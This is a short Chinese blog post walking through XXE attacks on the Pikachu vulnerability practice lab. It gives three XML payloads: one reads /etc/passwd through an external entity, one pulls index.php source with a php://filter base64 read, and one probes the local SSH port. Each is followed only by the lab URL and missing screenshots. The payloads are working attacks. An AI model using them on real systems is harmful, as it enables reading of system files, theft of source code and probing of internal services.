0
点赞
收藏
分享

微信扫一扫

Pikachu XXE漏洞1

夕颜合欢落 2022-05-22 阅读 71
phpxml

<?xml
version="1.0"?>

<!DOCTYPE
creds[

<!ELEMENT
username ANY>

<!ELEMENT
password ANY>

<!ENTITY xxe
SYSTEM "file:///etc/passwd">]>

<creds>

<username>&xxe;</username>

<password>test</password>

</creds>

Pikachu XXE漏洞1_xml

访问​​http://192.168.4.130/xxe/index.php​​

Pikachu XXE漏洞1_php_02

<?xml
version="1.0"?>

<!DOCTYPE
creds[

<!ELEMENT
username ANY>

<!ELEMENT
password ANY>

<!ENTITY xxe SYSTEM
"php://filter/read=convert.base64-encode/resource=index.php">]>

<creds>

<username>&xxe;</username>

<password>test</password>

</creds>

Pikachu XXE漏洞1_xml_03

访问​​http://192.168.4.130/xxe/index.php​​

Pikachu XXE漏洞1_php_04

<?xml
version="1.0"?>

<!DOCTYPE
creds[

<!ELEMENT
username ANY>

<!ELEMENT
password ANY>

<!ENTITY xxe SYSTEM "http://127.0.0.1:22">]>

<creds>

<username>&xxe;</username>

<password>test</password>

</creds>

Pikachu XXE漏洞1_php_05访问​


​​http://192.168.4.130/xxe/index.php​​

Pikachu XXE漏洞1_xml_06

举报

相关推荐

0 条评论